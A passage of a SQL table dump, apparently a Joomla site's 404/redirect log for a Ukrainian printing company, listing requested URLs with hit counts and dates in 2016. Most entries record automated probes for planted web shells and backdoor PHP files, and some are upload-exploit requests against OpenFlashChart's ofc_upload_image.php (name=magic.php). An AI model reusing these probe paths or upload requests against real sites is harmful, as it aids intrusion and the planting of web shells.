00:00:00',301),(1903,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/voice.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/voice.php','',4,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1904,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/en.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/en.php','',4,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1905,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/default/ppl.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/default/ppl.php','',4,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1906,'http://ekvatorprint.com.ua/media/ef.php',NULL,'http://ekvatorprint.com.ua/media/ef.php','',3,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1907,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/core.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/core.php','',3,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1908,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/core.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/core.php','',3,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1909,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/highcontrast/en.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/highcontrast/en.php','',4,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1910,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/voice.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/voice.php','',4,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1911,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/sys.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/sys.php','',3,0,'2016-08-29 09:22:32','0000-00-00 00:00:00',301),(1912,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/default/en.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/default/en.php','',3,0,'2016-08-29 09:22:33','0000-00-00 00:00:00',301),(1913,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/mod_joomlasec.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/o2k7/img/mod_joomlasec.php','',3,0,'2016-08-29 09:22:33','0000-00-00 00:00:00',301),(1914,'http://ekvatorprint.com.ua/modules/mod_articless/mod_xmljquery.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articless/mod_xmljquery.php','',6,0,'2016-08-29 09:22:55','0000-00-00 00:00:00',301),(1915,'http://ekvatorprint.com.ua/modules/mod_araticlhess/archives.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlhess/archives.php','',4,0,'2016-08-29 09:22:56','0000-00-00 00:00:00',301),(1916,'http://ekvatorprint.com.ua/modules/mod_aplle/mod_aplle.php',NULL,'http://ekvatorprint.com.ua/modules/mod_aplle/mod_aplle.php','',4,0,'2016-08-29 09:22:57','0000-00-00 00:00:00',301),(1917,'http://ekvatorprint.com.ua/modules/mod_araticlasic/mod_araticlasic.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlasic/mod_araticlasic.php','',3,0,'2016-08-29 09:22:58','0000-00-00 00:00:00',301),(1918,'http://ekvatorprint.com.ua/modules/mod_ariimagesws/mod_ariimagesws.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimagesws/mod_ariimagesws.php','',8,0,'2016-08-29 09:22:59','0000-00-00 00:00:00',301),(1919,'http://ekvatorprint.com.ua/modules/mod_articles/mod_articles.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles/mod_articles.php','',5,0,'2016-08-29 09:23:00','0000-00-00 00:00:00',301),(1920,'http://ekvatorprint.com.ua/modules/mod_feed/feed.php',NULL,'http://ekvatorprint.com.ua/modules/mod_feed/feed.php','',3,0,'2016-08-29 09:23:00','0000-00-00 00:00:00',301),(1921,'http://ekvatorprint.com.ua/modules/mod_enrola/mod_enrola.php',NULL,'http://ekvatorprint.com.ua/modules/mod_enrola/mod_enrola.php','',4,0,'2016-08-29 09:23:00','0000-00-00 00:00:00',301),(1922,'http://ekvatorprint.com.ua/modules/mod_articless/func.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articless/func.php','',3,0,'2016-08-29 09:23:01','0000-00-00 00:00:00',301),(1923,'http://ekvatorprint.com.ua/modules/mod_araticlhess/func.php',NULL,'http://ekvatorprint.com.ua/modules/mod_araticlhess/func.php','',3,0,'2016-08-29 09:23:01','0000-00-00 00:00:00',301),(1924,'http://ekvatorprint.com.ua/modules/mod_add/mod_add.php',NULL,'http://ekvatorprint.com.ua/modules/mod_add/mod_add.php','',5,0,'2016-08-29 09:23:01','0000-00-00 00:00:00',301),(1925,'http://ekvatorprint.com.ua/modules/mod_catalog/mod_catalog.php',NULL,'http://ekvatorprint.com.ua/modules/mod_catalog/mod_catalog.php','',3,0,'2016-08-29 09:23:01','0000-00-00 00:00:00',301),(1926,'http://ekvatorprint.com.ua/media/system/js/cms.php',NULL,'http://ekvatorprint.com.ua/media/system/js/cms.php','',6,0,'2016-08-29 09:23:02','0000-00-00 00:00:00',301),(1927,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/system_ml.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/system_ml.php','',6,0,'2016-08-29 09:23:02','0000-00-00 00:00:00',301),(1928,'http://ekvatorprint.com.ua/modules/mod_joomlasec/mod_joomlasec.php',NULL,'http://ekvatorprint.com.ua/modules/mod_joomlasec/mod_joomlasec.php','',5,0,'2016-08-29 09:23:03','0000-00-00 00:00:00',301),(1929,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/poll.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/poll.php','',4,0,'2016-08-29 09:23:03','0000-00-00 00:00:00',301),(1930,'http://ekvatorprint.com.ua/modules/mod_msn/mod_msn.php',NULL,'http://ekvatorprint.com.ua/modules/mod_msn/mod_msn.php','',5,0,'2016-08-29 09:23:03','0000-00-00 00:00:00',301),(1931,'http://ekvatorprint.com.ua/modules/mod_myblog_archive/mod_myblog_archive1.php',NULL,'http://ekvatorprint.com.ua/modules/mod_myblog_archive/mod_myblog_archive1.php','',6,0,'2016-08-29 09:23:03','0000-00-00 00:00:00',301),(1932,'http://ekvatorprint.com.ua/modules/mod_s/mod_s.php',NULL,'http://ekvatorprint.com.ua/modules/mod_s/mod_s.php','',3,0,'2016-08-29 09:23:04','0000-00-00 00:00:00',301),(1933,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/eng.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/eng.php','',5,0,'2016-08-29 09:23:04','0000-00-00 00:00:00',301),(1934,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/libraries.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/libraries.php','',4,0,'2016-08-29 09:23:04','0000-00-00 00:00:00',301),(1935,'http://ekvatorprint.com.ua/modules/mod_jcomment/mod_jcomment.php',NULL,'http://ekvatorprint.com.ua/modules/mod_jcomment/mod_jcomment.php','',6,0,'2016-08-29 09:23:04','0000-00-00 00:00:00',301),(1936,'http://ekvatorprint.com.ua/modules/mod_new/mod_new.php',NULL,'http://ekvatorprint.com.ua/modules/mod_new/mod_new.php','',7,0,'2016-08-29 09:23:04','0000-00-00 00:00:00',301),(1937,'http://ekvatorprint.com.ua/modules/mod_joom/mod_joom.php',NULL,'http://ekvatorprint.com.ua/modules/mod_joom/mod_joom.php','',5,0,'2016-08-29 09:23:04','0000-00-00 00:00:00',301),(1938,'http://ekvatorprint.com.ua/modules/mod_random_image/tmpl/styles.php',NULL,'http://ekvatorprint.com.ua/modules/mod_random_image/tmpl/styles.php','',11,0,'2016-08-29 09:23:05','0000-00-00 00:00:00',301),(1939,'http://ekvatorprint.com.ua/modules/mod_random_image/tmpl/clear.php',NULL,'http://ekvatorprint.com.ua/modules/mod_random_image/tmpl/clear.php','',4,0,'2016-08-29 09:23:05','0000-00-00 00:00:00',301),(1940,'http://ekvatorprint.com.ua/modules/mod_fxprev/helper.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/helper.php','',5,0,'2016-08-29 09:23:05','0000-00-00 00:00:00',301),(1941,'http://ekvatorprint.com.ua/plugins/system/plg_system_rewrite/copyright.php',NULL,'http://ekvatorprint.com.ua/plugins/system/plg_system_rewrite/copyright.php','',7,0,'2016-08-29 09:23:53','0000-00-00 00:00:00',301),(1942,'http://ekvatorprint.com.ua/modules/mod_system.php',NULL,'http://ekvatorprint.com.ua/modules/mod_system.php','',7,0,'2016-08-29 09:23:53','0000-00-00 00:00:00',301),(1943,'http://ekvatorprint.com.ua/plugins/system/core.php',NULL,'http://ekvatorprint.com.ua/plugins/system/core.php','',4,0,'2016-08-29 09:23:53','0000-00-00 00:00:00',301),(1944,'http://ekvatorprint.com.ua/modules/mod_stop/mod_stop.php',NULL,'http://ekvatorprint.com.ua/modules/mod_stop/mod_stop.php','',3,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1945,'http://ekvatorprint.com.ua/plugins/search/index.php',NULL,'http://ekvatorprint.com.ua/plugins/search/index.php','',7,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1946,'http://ekvatorprint.com.ua/plugins/system/plg_system_anticopy/anticopy.php',NULL,'http://ekvatorprint.com.ua/plugins/system/plg_system_anticopy/anticopy.php','',7,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1947,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/en.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/en.php','',3,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1948,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php','',8,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1949,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha.php',NULL,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha.php','',4,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1950,'http://ekvatorprint.com.ua/plugins/search/conhost.php',NULL,'http://ekvatorprint.com.ua/plugins/search/conhost.php','',4,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1951,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/system-ml.php',NULL,'http://ekvatorprint.com.ua/plugins/captcha/jproicaptcha/system-ml.php','',2,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1952,'http://ekvatorprint.com.ua/plugins/system/core/core.php',NULL,'http://ekvatorprint.com.ua/plugins/system/core/core.php','',5,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1953,'http://ekvatorprint.com.ua/plugins/user/inc.php',NULL,'http://ekvatorprint.com.ua/plugins/user/inc.php','',4,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1954,'http://ekvatorprint.com.ua/modules/mod_systems/tmpl/template.php',NULL,'http://ekvatorprint.com.ua/modules/mod_systems/tmpl/template.php','',4,0,'2016-08-29 09:23:54','0000-00-00 00:00:00',301),(1955,'http://ekvatorprint.com.ua/tmp/es.php',NULL,'http://ekvatorprint.com.ua/tmp/es.php','',3,0,'2016-08-29 09:23:57','0000-00-00 00:00:00',301),(1956,'http://ekvatorprint.com.ua/tmp/sysm.php',NULL,'http://ekvatorprint.com.ua/tmp/sysm.php','',2,0,'2016-08-29 09:23:57','0000-00-00 00:00:00',301),(1957,'http://ekvatorprint.com.ua/tmp/info.php',NULL,'http://ekvatorprint.com.ua/tmp/info.php','',4,0,'2016-08-29 09:23:57','0000-00-00 00:00:00',301),(1958,'http://ekvatorprint.com.ua/templates/beez3/system.php',NULL,'http://ekvatorprint.com.ua/templates/beez3/system.php','',4,0,'2016-08-29 09:23:57','0000-00-00 00:00:00',301),(1959,'http://ekvatorprint.com.ua/tmp/simple.php',NULL,'http://ekvatorprint.com.ua/tmp/simple.php','',4,0,'2016-08-29 09:23:57','0000-00-00 00:00:00',301),(1960,'http://ekvatorprint.com.ua/templates/system/css/system.php',NULL,'http://ekvatorprint.com.ua/templates/system/css/system.php','',6,0,'2016-08-29 09:23:57','0000-00-00 00:00:00',301),(1961,'http://ekvatorprint.com.ua/templates/system/gifts.php',NULL,'http://ekvatorprint.com.ua/templates/system/gifts.php','',3,0,'2016-08-29 09:23:58','0000-00-00 00:00:00',301),(1962,'http://ekvatorprint.com.ua/tmp/config.php',NULL,'http://ekvatorprint.com.ua/tmp/config.php','',11,0,'2016-08-29 09:23:58','0000-00-00 00:00:00',301),(1963,'http://ekvatorprint.com.ua/printing-on-vin',NULL,'','',3,0,'2016-08-29 12:16:59','0000-00-00 00:00:00',301),(1964,'http://ekvatorprint.com.ua/wp-index2.php',NULL,'http://ekvatorprint.com.ua/wp-index2.php','',1,0,'2016-08-30 09:34:21','0000-00-00 00:00:00',301),(1965,'http://ekvatorprint.com.ua/cde42170f4f5b29105ed3977c1f5f4d1.php',NULL,'http://ekvatorprint.com.ua/cde42170f4f5b29105ed3977c1f5f4d1.php','',2,0,'2016-08-31 08:20:25','0000-00-00 00:00:00',301),(1966,'http://ekvatorprint.com.ua/joomla/components/com_content/metadata.xml',NULL,'','',2,0,'2016-08-31 11:30:24','0000-00-00 00:00:00',301),(1967,'http://ekvatorprint.com.ua/kickstart.php',NULL,'http://ekvatorprint.com.ua/','',12,0,'2016-08-31 11:58:34','0000-00-00 00:00:00',301),(1968,'http://ekvatorprint.com.ua/kickstart/kickstart.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2016-08-31 11:58:35','0000-00-00 00:00:00',301),(1969,'http://ekvatorprint.com.ua/kickstart-core/kickstart.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2016-08-31 11:58:35','0000-00-00 00:00:00',301),(1970,'http://ekvatorprint.com.ua/akeeba/kickstart.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2016-08-31 11:58:35','0000-00-00 00:00:00',301),(1971,'http://ekvatorprint.com.ua/backup/kickstart.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2016-08-31 11:58:35','0000-00-00 00:00:00',301),(1972,'http://ekvatorprint.com.ua/backups/kickstart.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2016-08-31 11:58:35','0000-00-00 00:00:00',301),(1973,'http://ekvatorprint.com.ua/akeeba-backup/kickstart.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2016-08-31 11:58:35','0000-00-00 00:00:00',301),(1974,'http://ekvatorprint.com.ua/images/db_config.php.xxxjpg',NULL,'http://ekvatorprint.com.ua/images/db_config.php.xxxjpg','',2,0,'2016-08-31 17:13:40','0000-00-00 00:00:00',301),(1975,'http://ekvatorprint.com.ua/nextlabel.gif',NULL,'http://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/css/slimbox2.css','',1,0,'2016-08-31 19:43:19','0000-00-00 00:00:00',301),(1976,'http://ekvatorprint.com.ua/closelabel.gif',NULL,'http://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/css/slimbox2.css','',1,0,'2016-08-31 19:43:20','0000-00-00 00:00:00',301),(1977,'http://ekvatorprint.com.ua/prevlabel.gif',NULL,'http://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/css/slimbox2.css','',1,0,'2016-08-31 19:43:20','0000-00-00 00:00:00',301),(1978,'http://ekvatorprint.com.ua/images/0/db_config.php.xxxjpg',NULL,'http://ekvatorprint.com.ua/images/0/db_config.php.xxxjpg','',2,0,'2016-09-01 08:29:17','0000-00-00 00:00:00',301),(1979,'http://ekvatorprint.com.ua/administrator/components/com_admin/helpers.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_admin/helpers.php','',7,0,'2016-09-01 20:06:32','0000-00-00 00:00:00',301),(1980,'http://ekvatorprint.com.ua/images/ini.php',NULL,'http://ekvatorprint.com.ua/images/ini.php','',10,0,'2016-09-01 20:06:32','0000-00-00 00:00:00',301),(1981,'http://ekvatorprint.com.ua/components/com_content/models/index.php',NULL,'http://ekvatorprint.com.ua/components/com_content/models/index.php','',5,0,'2016-09-01 20:06:33','0000-00-00 00:00:00',301),(1982,'http://ekvatorprint.com.ua/components/com_banners/helpers/sys.php',NULL,'http://ekvatorprint.com.ua/components/com_banners/helpers/sys.php','',4,0,'2016-09-01 20:06:33','0000-00-00 00:00:00',301),(1983,'http://ekvatorprint.com.ua/components/com_contact/index.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/index.php','',7,0,'2016-09-01 20:06:33','0000-00-00 00:00:00',301),(1984,'http://ekvatorprint.com.ua/components/com_weblinks/index.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/index.php','',6,0,'2016-09-01 20:06:33','0000-00-00 00:00:00',301),(1985,'http://ekvatorprint.com.ua/modules/mod_articless/mod_articless.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articless/mod_articless.php','',7,0,'2016-09-01 20:06:51','0000-00-00 00:00:00',301),(1986,'http://ekvatorprint.com.ua/plugins/system/anticopy/anticopy.php',NULL,'http://ekvatorprint.com.ua/plugins/system/anticopy/anticopy.php','',9,0,'2016-09-01 20:06:52','0000-00-00 00:00:00',301),(1987,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/archives.php',NULL,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/archives.php','',11,0,'2016-09-01 20:06:52','0000-00-00 00:00:00',301),(1988,'http://ekvatorprint.com.ua/plugins/system/anticopy/debug.php',NULL,'http://ekvatorprint.com.ua/plugins/system/anticopy/debug.php','',9,0,'2016-09-01 20:06:52','0000-00-00 00:00:00',301),(1989,'http://ekvatorprint.com.ua/tmp/system.php',NULL,'http://ekvatorprint.com.ua/tmp/system.php','',8,0,'2016-09-01 20:06:53','0000-00-00 00:00:00',301),(1990,'http://ekvatorprint.com.ua/tmp/index.php',NULL,'http://ekvatorprint.com.ua/tmp/index.php','',6,0,'2016-09-01 20:06:53','0000-00-00 00:00:00',301),(1991,'http://ekvatorprint.com.ua/tmp/temp.php',NULL,'http://ekvatorprint.com.ua/tmp/temp.php','',6,0,'2016-09-01 20:06:53','0000-00-00 00:00:00',301),(1992,'http://ekvatorprint.com.ua/plugins/editors-xtd/mosimage.php',NULL,'http://ekvatorprint.com.ua/plugins/editors-xtd/mosimage.php','',6,0,'2016-09-01 20:06:53','0000-00-00 00:00:00',301),(1993,'http://ekvatorprint.com.ua/tmp/install.css.php',NULL,'http://ekvatorprint.com.ua/tmp/install.css.php','',6,0,'2016-09-01 20:06:53','0000-00-00 00:00:00',301),(1994,'http://ekvatorprint.com.ua/admin/scripts/elfinder-2.0-rc1/elfinder.html',NULL,'','',1,0,'2016-09-03 03:04:49','0000-00-00 00:00:00',301),(1995,'http://ekvatorprint.com.ua/archi/archi/vendor/barryvdh/elfinder-builds/elfinder.html',NULL,'','',1,0,'2016-09-03 03:04:50','0000-00-00 00:00:00',301),(1996,'http://ekvatorprint.com.ua/public/thirdParty/elfinder-ckeditor/elfinder.html',NULL,'','',1,0,'2016-09-03 03:04:50','0000-00-00 00:00:00',301),(1997,'http://ekvatorprint.com.ua/tcsts/tcelf/elfinder.html',NULL,'','',1,0,'2016-09-03 03:04:50','0000-00-00 00:00:00',301),(1998,'http://ekvatorprint.com.ua/printing-on-canvasnjk',NULL,'http://vk.com/away.php','',2,0,'2016-09-04 15:59:08','0000-00-00 00:00:00',301),(1999,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/tooltip.js',NULL,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/tooltip.js','',17,0,'2016-09-05 08:06:30','0000-00-00 00:00:00',301),(2000,'http://ekvatorprint.com.ua/administrator/components/com_facileforms/libraries/jquery/tooltip.js',NULL,'http://ekvatorprint.com.ua/administrator/components/com_facileforms/libraries/jquery/tooltip.js','',11,0,'2016-09-06 08:20:55','0000-00-00 00:00:00',301),(2001,'http://ekvatorprint.com.ua/administrator/info.php',NULL,'','',2,0,'2016-09-06 16:27:20','0000-00-00 00:00:00',301),(2002,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-96-fill-254x170.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2003,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-90-fill-260x169.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2004,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-97-fill-249x167.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2005,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-114-fill-254x152.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2006,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-100-fill-247x154.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2007,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-91-fill-254x164.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2008,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-87-fill-251x163.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2009,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-102-fill-253x158.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2010,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-95-fill-242x163.png',NULL,'','',1,0,'2016-09-11 18:37:11','0000-00-00 00:00:00',301),(2011,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-101-fill-238x148.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2012,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-105-fill-253x158.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2013,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-117-fill-258x151.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2014,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-93-fill-261x177.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2015,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-99-fill-251x157.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2016,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-88-fill-253x144.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2017,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-92-fill-240x146.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2018,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-103-fill-249x146.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2019,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-98-fill-242x152.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2020,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-112-fill-247x142.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2021,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-115-fill-250x149.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2022,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-118-fill-250x144.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2023,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-113-fill-236x154.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2024,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-104-fill-238x149.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2025,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-106-fill-246x153.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2026,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-107-fill-241x151.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2027,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-116-fill-236x142.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2028,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-111-fill-246x96.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2029,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-119-fill-239x140.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2030,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-108-fill-254x93.png',NULL,'','',1,0,'2016-09-11 18:37:12','0000-00-00 00:00:00',301),(2031,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-109-fill-248x98.png',NULL,'','',1,0,'2016-09-11 18:37:13','0000-00-00 00:00:00',301),(2032,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-110-fill-243x96.png',NULL,'','',1,0,'2016-09-11 18:37:13','0000-00-00 00:00:00',301),(2033,'http://ekvatorprint.com.ua/images/thumbnails/images/modulnie kartini/РјРє-94-fill-251x142.png',NULL,'','',1,0,'2016-09-11 18:37:13','0000-00-00 00:00:00',301),(2034,'http://ekvatorprint.com.ua/includes.php',NULL,'','',7,0,'2016-09-15 09:31:33','0000-00-00 00:00:00',301),(2035,'http://ekvatorprint.com.ua/printing-on-vinylolx',NULL,'','',1,0,'2016-09-15 09:43:08','0000-00-00 00:00:00',301),(2036,'http://ekvatorprint.com.ua/cart',NULL,'','',2,0,'2016-09-15 17:46:05','0000-00-00 00:00:00',301),(2037,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-129.png',NULL,'','',2,0,'2016-09-17 13:45:40','0000-00-00 00:00:00',301),(2038,'http://ekvatorprint.com.ua/images/pimeri_shablonov/РјС€5-1 превью.png',NULL,'','',1,0,'2016-09-17 15:31:13','0000-00-00 00:00:00',301),(2039,'http://ekvatorprint.com.ua/cache.php?blog',NULL,'','',2,0,'2016-09-17 21:02:51','0000-00-00 00:00:00',301),(2040,'http://ekvatorprint.com.ua/390A8445288EB168D408B7B3C12F3DA5.html',NULL,'app:/ServerCheck.swf','',2,0,'2016-09-20 07:41:57','0000-00-00 00:00:00',301),(2041,'http://ekvatorprint.com.ua/17426FA37B46E99BA6DA3E9827EEDFF2.html',NULL,'app:/ServerCheck.swf','',2,0,'2016-09-20 07:44:49','0000-00-00 00:00:00',301),(2042,'http://ekvatorprint.com.ua/component/contact/contact/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php',NULL,'','',1,0,'2016-09-20 14:17:11','0000-00-00 00:00:00',301),(2043,'http://ekvatorprint.com.ua/component/contact/contact/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp',NULL,'','',1,0,'2016-09-20 14:17:12','0000-00-00 00:00:00',301),(2044,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php',NULL,'','',1,0,'2016-09-20 14:17:13','0000-00-00 00:00:00',301),(2045,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp',NULL,'','',1,0,'2016-09-20 14:17:14','0000-00-00 00:00:00',301),(2046,'http://ekvatorprint.com.ua/component/contact/contact/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php',NULL,'','',1,0,'2016-09-20 